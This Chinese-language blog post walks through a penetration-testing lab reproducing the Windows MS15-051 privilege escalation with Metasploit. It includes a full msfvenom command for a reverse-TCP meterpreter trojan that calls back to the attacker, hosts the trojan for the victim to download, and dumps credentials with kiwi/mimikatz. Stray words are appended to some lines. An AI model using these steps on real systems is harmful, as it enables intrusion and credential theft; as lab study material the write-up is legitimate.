ms15-051漏洞复现

本文首发于个人我的博客,记录了我在实验室学习渗透测试所作的第三个实验,以此文记录,但愿能对您有所帮助。html

若是文章哪里有错,请去点击个人我的博客连接进行核对(多是转移博客时候出错了),也能够在评论区留言告知。linux

前言

Metasploit

Metasploit是一款开源的渗透测试工具,能够帮助安全员发现漏洞问题,此工具带有的攻击模块能够帮助安全员简单的利用相关的漏洞。git

实验目的

本实验经过Metasploit对内网机器进行渗透,而且使用ms15-051进行权限提高,获取Window Server 2008的SYSTEM权限,最后进行远程控制。shell

实验原理

Metasploit框架使Metasploit具备良好的扩展性,它的控制接口负责发现漏洞、攻击漏洞、提交漏洞,而后经过一些接口加入攻击后处理工具和报表工具。Metasploit框架能够从一个漏洞扫描程序导入数据,使用关于有漏洞主机的详细信息来发现可攻击漏洞,而后使用有效载荷对系统发起攻击。全部这些操做均可以经过Metasploit的Web界面进行管理,而它只是其中一种管理接口,另外还有命令行工具和一些商业工具等。攻击者能够将漏洞扫描程序的结果导入到Metasploit框架的开源安全工具Armitage中,而后经过Metasploit的模块来肯定漏洞。一旦发现了漏洞,攻击者就能够采起一种可行方法攻击系统,经过Shell或启动Metasploit的meterpreter来控制这个系统。这些有效载荷就是在得到本地系统访问后执行的一系列命令。这个过程须要参考一些文档并使用一些数据库技术,在发现漏洞以后开发一种可行的攻击方法,其中有效载荷数据库包含用于提取本地系统密码、安装其余软件或控制硬件等的模块,这些功能很象之前BO2K等工具所具有的功能。数据库

漏洞CVE-2015-1701

受影响的系统:apache

  • Windows Vista
  • WIndows Server 2012 R2
  • WIndows Server 2012
  • WIndows Server 2008 R2
  • WIndows Server 2008
  • WIndows Server 2003
  • WIndows RT 8.1
  • Windows RT
  • Windows 8.1
  • Windows 8
  • Windows 7

漏洞成因:Win32.k.sys内核模式驱动程序没有正确处理内存对象,在实现上存在权限提高漏洞windows

漏洞危害:成功利用此漏洞可以使攻击者在内核模式中运行任意代码。安全

漏洞利用:攻击者必须具备有效的登录凭证,而且能够本地登陆以利用此漏洞。服务器

实验环境

攻击机:Kali Linux框架

靶机:Windows Server 2008

实验步骤

  1. 使用msfvenom生成木马

    msfvenom -p windows/meterpreter/reverse_tcp lhost=攻击机IP lport=4444 -f exe > shell.exe

  2. 安装xampp,并启动。(我安装在了/opt下)

  3. 把生成的木马挂在服务器上等待靶机下载

    在opt/lampp/htdocs/下建立目录shell,提高shell及其全部文件和子目录的权限为全部人可读可写可执行。chmod命令用法

  4. 把生成的木马复制到网站目录

  5. 使用msf的handler模块

  6. 设置payload及其参数

    payload要和木马的payload一致(即windows/meterpreter/reverse_tcp)


  7. 从新启动网站

    不要关闭原来的终端,新建终端,从新启动网站。

  8. 打开靶机windows server 2008,访问http://攻击机IP/shell,下载木马shell.exe(先将该网站加入受信任的站点)。下载完成后,运行。

  9. 返回攻击机,已成功获取靶机的shell,getuid可查看当前权限

  1. 使用ms15-051漏洞,进一步获取system更高权限

    首先输入backgroud,把会话切换进后台,以后:

  2. 设置payload及其参数

  3. 键入run以攻击,getuid以并查看当前权限。

    攻击成功,而且当前已经是SYSTEM用户。靶机的IP地址为192.168.227.130(后面要用)。

  4. 加载kiwi,获取用户密码

    若是是windows server 2003,则加载mimikatz,由于我用的靶机为windows server 2008,所以须要用kiwi。其余系统你能够先加载mimikatz,根据提示选择你要加载什么(下图中,我最早加载的是mimikatz,它提示我应该使用kiwi来代替)。

    由于我没有给用户设置密码,因此Password一列均为空(这里其实须要设置密码的,后面会讲到)。

  5. 远程链接靶机

    首先在windows server 2008进行以下设置,容许运行任意版本远程桌面的计算机链接。

    而后回到攻击机,新建一个终端,输入rdesktop 靶机IP,远程链接靶机。

    因为rdesktop不支持无密码登陆,所以我此时并不能使用用户名zxy登陆。因此只能先返回windows,在服务管理器中为用户名为zxy的用户设置密码。

    再次返回攻击机,使用rdesktop命令远程链接主机,点击“其余用户”,输入用户名zxy和刚刚设置的密码后,链接成功:

  6. 成功入侵靶机,查看IP和用户。

    至此,实验已所有结束。